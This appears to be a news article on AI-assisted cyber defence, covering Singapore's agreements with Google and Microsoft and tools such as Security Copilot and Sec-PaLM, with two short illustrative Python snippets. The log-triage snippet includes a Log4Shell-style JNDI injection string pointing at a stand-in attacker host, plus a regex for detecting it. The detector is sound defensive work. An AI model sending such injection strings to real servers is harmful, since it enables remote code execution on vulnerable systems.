While AI has been a source of worry for many cybersecurity professionals, the technology has also opened up a range of capabilities that businesses can tap to deepen and scale up their expertise to ward off future attacks, say experts.
AI can help human operators facing a deluge of alerts zero in on real threats, automatically generate security controls, policies and configurations to beef up security, and even provide timely advice during an ongoing cyber attack, they add.
Earlier this week, the Cyber Security Agency of Singapore inked two separate deals with Google and Microsoft to tap private-sector expertise for national cyber defence. The cooperation will include threat intelligence sharing, joint operations, technical collaboration and capacity building.
Singapore, together with its counterparts around the South China Sea, was targeted for intelligence collection, according to a Microsoft security report this year.
The Republic was also among the top 10 countries listed as victims of cracked versions of Cobalt Strike, a tool cyber criminals use to elevate privileges and enumerate access after compromising a victim’s system.
The collaboration with the Singapore authorities offers a chance to leverage collective capabilities and pursue the adoption of new technologies, including AI, said Microsoft’s corporate vice-president for customer security and trust, Tom Burt.
For example, Microsoft’s Security Copilot, released in limited preview earlier this year, uses OpenAI’s GPT-4 generative AI to collate insights from various Microsoft products, quickly identify threats for businesses and provide instructions for remediation.
Google, for its part, has also been pushing AI to bolster cybersecurity for businesses.
For example, it offers AI-powered remediation and frontline threat intelligence, so human operators do not have to sift through reams of logs and other information to identify a persistent threat.
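To give a sense of the kind of sifting such tools automate, here is a minimal, illustrative Python sketch that flags Log4Shell-style JNDI probes in web server logs. The sample log lines, the pattern and the function name are assumptions made for the example, not a description of Google's or Microsoft's products.

```python
import re

# Illustrative only: a crude version of the log triage that AI-assisted
# security tooling automates at far greater scale and sophistication.
# The sample lines and the pattern below are assumptions for this example.
JNDI_PATTERN = re.compile(r"\$\{[^}]{0,30}jndi[^}]{0,30}:", re.IGNORECASE)

SAMPLE_LOG_LINES = [
    '10.0.0.5 - - "GET /index.html HTTP/1.1" 200',
    '203.0.113.7 - - "GET /?q=${jndi:ldap://evil.example/a} HTTP/1.1" 404',
    '10.0.0.8 - - "POST /login HTTP/1.1" 302',
]

def flag_suspicious(lines):
    """Return (line number, line) pairs that look like Log4Shell probes."""
    return [
        (lineno, line)
        for lineno, line in enumerate(lines, start=1)
        if JNDI_PATTERN.search(line)
    ]

if __name__ == "__main__":
    for lineno, line in flag_suspicious(SAMPLE_LOG_LINES):
        print(f"line {lineno}: possible JNDI lookup attempt -> {line}")
```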
Earlier this year, the technology giant also unveiled its Security AI Workbench, which makes use of generative AI models to provide better visibility of cyber threats.
The workbench is built on the company’s Sec-PaLM, a large language model (LLM) tuned for security, according to Google. One way this helps is by providing natural-language explanations or summaries of threats so that they can be quickly flagged and neutralised.
The company’s Duet AI assistant, when deployed in a security command centre, will also be able to advise what to do when a threat is found, said Mark Johnston, director of the Office of the CISO at Google Cloud.
This means the assistant can offer operators suggestions such as deploying a Web application firewall to counter a distributed denial-of-service (DDoS) attack or patching a Log4j vulnerability, he told journalists at an AI workshop in Singapore this week.
With Google’s AI solution, businesses can run simulations to see the outcome of, say, changing the settings on a firewall to block a known threat’s entry point.
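As a rough illustration of that "what if" idea, the vendor-agnostic Python sketch below checks whether a proposed firewall rule change would block a known-bad source before the change is applied. The rule model, the addresses and the default-allow behaviour are simplifying assumptions for the example, not Google's simulation feature.

```python
from dataclasses import dataclass

# Toy model of a "what if" check: evaluate a proposed firewall rule change
# against a known threat's entry point before applying it. All names and
# addresses here are illustrative assumptions.

@dataclass
class Rule:
    action: str   # "allow" or "deny"
    source: str   # source IP, exact match for simplicity
    port: int

def evaluate(rules, source, port):
    """First matching rule wins; traffic is allowed by default in this model."""
    for rule in rules:
        if rule.source == source and rule.port == port:
            return rule.action
    return "allow"

current_rules = []  # no explicit rules yet
proposed_rules = [Rule("deny", "198.51.100.23", 443)] + current_rules

threat = ("198.51.100.23", 443)  # known-bad source from threat intelligence
print("before change:", evaluate(current_rules, *threat))   # allow
print("after change: ", evaluate(proposed_rules, *threat))  # deny
```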
Google’s approach is not unlike what Microsoft introduced earlier, and both still require humans at the wheel: for key decisions at least, an expert needs to approve an action before it is taken.
“AI is not a magic button to secure my website,” said Johnston. “It’s still engineering, not magic.”